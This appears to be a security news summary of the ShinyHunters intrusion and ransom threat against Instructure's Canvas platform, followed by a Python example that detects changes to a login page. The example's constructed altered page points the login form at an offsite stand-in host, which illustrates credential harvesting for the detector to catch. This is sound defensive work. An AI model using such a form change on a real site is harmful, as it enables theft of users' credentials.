Canvas LMS Restored After ShinyHunters Ransom Threat Exposes Data of Thousands of Schools
Instructure restored Canvas after detecting unauthorized activity on April 29, addressing a ransom claim affecting about 9,000 schools and billions of records.

TL;DR
Instructure restored Canvas after a ShinyHunters ransom threat exposed data from roughly 9,000 schools, having detected the breach on April 29 and taken the platform offline on May 7.
Canvas is a web‑based learning management system used by K‑12 districts and universities across the United States. On April 29, Instructure observed unauthorized activity within Canvas, revoked the intruder’s access, and enlisted forensic experts. The company notified affected schools on May 5.
On May 7, Instructure discovered additional unauthorized activity tied to the April 29 incident, including altered login pages. It shut down Canvas to investigate and contain the threat, later confirming the attacker exploited a vulnerability in Free‑For‑Teacher accounts, the same issue used in the prior week’s intrusion. Law enforcement, including the FBI and CISA, was notified.
ShinyHunters claimed responsibility, stating that Instructure ignored its outreach and merely applied security patches. The group asserted that nearly 9,000 schools worldwide were impacted and that billions of private messages and records were accessed, giving schools until May 12 to negotiate a settlement.
The breach exposed personal data such as names, email addresses, and student ID numbers for staff, students, and parents in multiple North Carolina districts, including UNC‑Chapel Hill, Duke, and Wake County Public Schools. The state’s Department of Public Instruction blocked Canvas access via NCEdCloud pending further review.
What It Means
Organizations should review Free‑For‑Teacher account configurations, enforce multi‑factor authentication, and monitor for unauthorized changes to login pages. Detecting credential misuse aligns with MITRE ATT&CK technique T1078 (Valid Accounts). Patching the identified Free‑For‑Teacher vulnerability and reviewing logs for anomalous authentication events are immediate steps. Watch for any updates from Instructure on the full data exposure scope and whether ShinyHunters follows through on its ransom threat.
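An added example, not from the original article or from Instructure: one way to monitor a login page for unauthorized changes is to compare where its form posts and which scripts and frames it loads against a known-good baseline. The URLs, the sample pages and the names `LoginPageFingerprint` and `diff_login_page` are assumptions constructed for illustration and do not reproduce the change made in this incident.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Attributes that decide where credentials are sent or what code the page loads.
WATCHED = {"form": "action", "script": "src", "iframe": "src"}

class LoginPageFingerprint(HTMLParser):
    def __init__(self, html, base_url):
        super().__init__()
        self.base_url, self.refs, self._script = base_url, set(), None
        self.feed(html)
        self.close()

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if attrs.get(WATCHED.get(tag, "")):
            self.refs.add((tag, urljoin(self.base_url, attrs[WATCHED[tag]])))
        elif tag == "script":
            self._script = []  # buffer the inline script body until </script>

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script).strip()
            if body:  # record inline code by digest so any edit shows up as new
                digest = hashlib.sha256(body.encode()).hexdigest()[:16]
                self.refs.add(("inline-script", "sha256:" + digest))
            self._script = None

def diff_login_page(baseline_html, current_html, base_url):
    old = LoginPageFingerprint(baseline_html, base_url).refs
    new = LoginPageFingerprint(current_html, base_url).refs
    host, findings = urlsplit(base_url).hostname, []
    for tag, ref in sorted(new - old):
        offsite = tag != "inline-script" and urlsplit(ref).hostname != host
        findings.append(("new-offsite" if offsite else "new", tag, ref))
    return findings + [("removed", tag, ref) for tag, ref in sorted(old - new)]

# Constructed sample pages (not taken from Canvas or from the incident).
BASE_URL = "https://lms.example.edu/login"
BASELINE = ('<html><head><script src="/assets/login.js"></script></head><body>'
            '<form action="/login" method="post"><input name="user">'
            '<input name="pass" type="password"></form></body></html>')
ALTERED = BASELINE.replace('action="/login"', 'action="https://other.example.net/submit"') \
                  .replace("</body>", "<script>var added = 1;</script></body>")
```

Comparing these references rather than a hash of the whole page keeps per-request values such as CSRF tokens from raising alerts on every fetch.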